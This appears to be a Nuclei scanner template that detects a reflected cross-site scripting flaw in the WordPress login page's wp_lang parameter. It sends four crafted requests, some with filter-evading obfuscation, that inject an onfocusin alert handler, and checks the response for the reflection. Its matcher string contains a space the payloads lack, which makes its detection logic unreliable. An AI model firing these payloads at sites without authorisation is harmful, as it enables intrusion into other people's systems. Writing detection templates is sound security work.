id: Wordpress-login-XSS

info:
  name: Wordpress XSS
  author: excis3
  severity: medium
  description: XSS in Wordpress login
  tags: xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(document.domain)%0c"
      - "{{BaseURL}}/blog/wp-login.php?wp_lang=en_US%27%22%20id=x%20tabindex=1%20onfocusin=alert(document.domain)%3E"
      - "{{BaseURL}}/wp/wp-login.php?wp_lang=en_US%27%22%20id=x%20tabindex=1%20on%3C!%3Efocusin=alert(document.domain)>"
      - "{{BaseURL}}/wp-login.php?wp_lang=en_US%27wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin>"

    matchers:
      - type: word
        part: body
        words:
          - 'onfocusin= alert('
